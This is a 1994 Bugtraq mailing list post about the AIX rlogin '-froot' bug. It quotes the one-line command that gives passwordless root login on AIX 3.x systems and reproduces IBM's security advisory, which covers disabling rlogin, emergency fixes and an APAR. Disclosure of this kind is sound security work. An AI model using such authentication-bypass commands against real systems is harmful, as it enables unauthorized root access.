Bugtraq mailing list archives
Re: -froot??? (AIX rlogin bug)
From: mgscheue () vela acs oakland edu (Mark G. Scheuern)
Date: Sat, 30 Jul 1994 07:52:22 -0400
Someone over on the firewalls mailing list just threw out this tidbit: rlogin aix.machine -l -froot For instance: rlogin foobar -l -froot This gives you root access on any AIX 3.2.X machine. Does anyone have any history on this trapdoor? Apparently it also existed in Linux several generations ago.Ericw
This popped up some weeks ago. This rlogind bug has been around for a long time; it's also in AIX 3.1.X. Here's IBM statement: ----------------------------------------------------------------- {URGENT - AIX SECURITY EXPOSURE} May 20, 1994 IBM has just become aware of an AIX security exposure that makes it possible to remote login to any AIX Version 3 system as the root user without a password. As described below, a workaround is immediately available which eliminates the security exposure by disabling remote login. An emergency fix is also available immediately to rectify the AIX problem so that remote login can be enabled with no security exposure. An APAR has been opened and an official PTF will be made available, in approximately two weeks, for installed AIX systems and included in all new AIX shipments. IBM hopes its efforts to respond rapidly to this problem will allow customers to eliminate this security exposure with minimal disruption. {IMMEDIATE WORKAROUND:} The recommended workaround is to disable rlogin in the /etc/inetd.conf file using the following procedure: 1. As root, edit /etc/inetd.conf 2. Comment out the line 'login ... rlogin' 3. Run 'inetimp' 4. Run 'refresh -s inetd' {EMERGENCY FIX:} Emergency Fixes for the different levels of AIX affected by this exposure will be available via anonymous ftp from software.watson.ibm.com. The files will be located in /pub/rlogin in compressed tar format. {OFFICIAL FIX:} The official fix for this problem can be ordered as Authorized Program Analysis Report (APAR) IX44254. To order an APAR from IBM in the U.S. call 1-800-237-5511 and ask for shipment as soon as it is available. APARs may be obtained outside the U.S. by contacting your local IBM representative. For questions regarding this information, please contact Frank Karner (KARNER at AUSTIN; TL/793-5950; 512-823-5950). ----------------------------------------------------------------- When I told one of our on-site IBM droids about this, he didn't believe it. "No way, the goverment buys these machines because they're Class B secure!" So I showed him... . I also saw an IBM spokesperson describe this in a trade publication as requiring "a complex series of commands". Hell, it's easier than logging in the usual way, with the password. Mark Scheuern Chrysler Corp. "I don't speak for Chrysler"
Current thread:
- Re: Bad Advise, (continued)
- Re: Bad Advise Philip Yzarn de Louraille (Jul 27)
- Re: Bad Advise jim () Tadpole COM (Jul 26)
- Re: Re: Bad Advise Pete Hartman (Jul 26)
- Re: Bad Advise Evil Pete (Jul 26)
- Re: Bad Advise David Lawrence Oppenheimer (Jul 26)
- Re: Bad Advise Harold van Aalderen (Jul 26)
- Re: Bad Advise Christopher Klaus (Jul 26)
- Re: Bad Advise Timothy Newsham (Jul 27)
- -froot??? (AIX rlogin bug) Eric Wedaa (Jul 29)
- Re: -froot??? (AIX rlogin bug) Aaron Eppert (Jul 29)
- Re: -froot??? (AIX rlogin bug) Mark G. Scheuern (Jul 30)
- Re: -froot??? (AIX rlogin bug) Alexander Haiut (Jul 30)
- Re: -froot??? (AIX rlogin bug) Baba Z Buehler (Jul 30)
- Solaris problems? James W. Abendschan (Jul 29)
- Re: Solaris problems? Steve Davis (Jul 30)
- Re: Solaris problems? jsz (Jul 30)
- Re: Solaris problems? Casper Dik (Jul 31)